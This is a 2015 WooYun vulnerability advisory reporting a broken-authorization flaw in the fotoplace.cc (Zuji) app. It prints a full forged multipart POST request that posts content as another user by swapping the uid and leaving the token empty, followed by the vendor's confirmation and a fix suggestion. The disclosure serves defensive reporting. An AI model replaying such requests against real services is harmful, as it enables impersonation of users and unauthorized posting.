当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102844

漏洞标题:足记app越权发送任意用户内容

相关厂商:fotoplace.cc

漏洞作者: Vern

提交时间:2015-03-30 13:59

修复时间:2015-05-14 14:42

公开时间:2015-05-14 14:42

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经确认,细节仅向厂商公开
2015-04-09: 细节向核心白帽子及相关领域专家公开
2015-04-19: 细节向普通白帽子公开
2015-04-29: 细节向实习白帽子公开
2015-05-14: 细节向公众公开

简要描述:

以任意用户权限发送 图形文字内容(一不小心大片即视感会跑偏哦)

详细说明:

自己在足记app上随便发送一个内容 然后抓包

1.png


没有对token验证 id参数可以控制 修改为目标用户id 217
然后提交包

POST /api2/home%2Fnewpost.php HTTP/1.1
Content-Type: multipart/form-data; boundary=6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Length: 748424
Host: fotoplace.cc
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/2.3.0
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="version"
Content-Type: text/plain; charset=UTF-8
Content-Length: 3
Content-Transfer-Encoding: binary
2.3
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="uid"
Content-Type: text/plain; charset=UTF-8
Content-Length: 7
Content-Transfer-Encoding: binary
217
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="token"
Content-Type: text/plain; charset=UTF-8
Content-Length: 64
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="type"
Content-Type: text/plain; charset=UTF-8
Content-Length: 4
Content-Transfer-Encoding: binary
post
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="photo"; filename="IMG_1426922379498.JPG"
Content-Type: 
Content-Length: 745335
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="footprintId"
Content-Type: text/plain; charset=UTF-8
Content-Length: 0
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="syncFootprintToDb"
Content-Type: text/plain; charset=UTF-8
Content-Length: 1
Content-Transfer-Encoding: binary
0
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="tags"
Content-Type: text/plain; charset=UTF-8
Content-Length: 2
Content-Transfer-Encoding: binary
[]
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="text"
Content-Type: text/plain; charset=UTF-8
Content-Length: 9
Content-Transfer-Encoding: binary
test by wooyun
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="lat"
Content-Type: text/plain; charset=UTF-8
Content-Length: 1
Content-Transfer-Encoding: binary
0
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="lng"
Content-Type: text/plain; charset=UTF-8
Content-Length: 1
Content-Transfer-Encoding: binary
0
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="locationName"
Content-Type: text/plain; charset=UTF-8
Content-Length: 0
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="locationAddress"
Content-Type: text/plain; charset=UTF-8
Content-Length: 0
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="locationDesc"
Content-Type: text/plain; charset=UTF-8
Content-Length: 0
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="topicTag"
Content-Type: text/plain; charset=UTF-8
Content-Length: 0
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd
Content-Disposition: form-data; name="activityId"
Content-Type: text/plain; charset=UTF-8
Content-Length: 0
Content-Transfer-Encoding: binary
--6df4609c-0455-47e6-b289-4f89229f7ddd--


2.png


上传成功

漏洞证明:

Screenshot_2015-03-21-15-36-59.png

修复方案:

各种验证 app上的大部分token都没起作用

版权声明:转载请注明来源 Vern@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-30 14:40

厂商回复:

多谢Vern

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-21 18:26 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    建立数据库连接时出错... 他们已经成这了。。。